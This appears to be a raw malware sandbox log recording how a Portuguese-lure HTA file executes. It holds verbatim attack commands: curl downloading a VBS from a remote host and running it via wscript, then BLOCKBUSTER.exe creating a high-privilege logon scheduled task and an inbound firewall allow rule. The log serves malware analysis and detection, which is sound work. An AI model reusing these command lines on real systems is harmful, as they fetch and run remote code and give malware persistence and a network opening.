    Source: C:\_6720c012c774c\BLOCKBUSTER.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_03
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeMutant created: \Sessions\1\BaseNamedObjects\Global\BeyondCompare3
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:740:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeMutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_6372
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeMutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$18e8$432c4c
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeMutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$18e4
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeMutant created: \Sessions\1\BaseNamedObjects\Beyond Compare: BE887BC7-16B2-48B5-B618-B3A52A26EC10
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1748:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeFile created: C:\Users\user\AppData\Local\Temp\BLOCKBUSTER.madExcept
    Source: Yara matchFile source: 0000001C.00000000.1471984407.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\_6720c012c774c\BLOCKBUSTER.exe "C:\_6720c012c774c\BLOCKBUSTER.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\_6720c012c774c\BLOCKBUSTER.exe "C:\_6720c012c774c\BLOCKBUSTER.exe"
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msdart.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
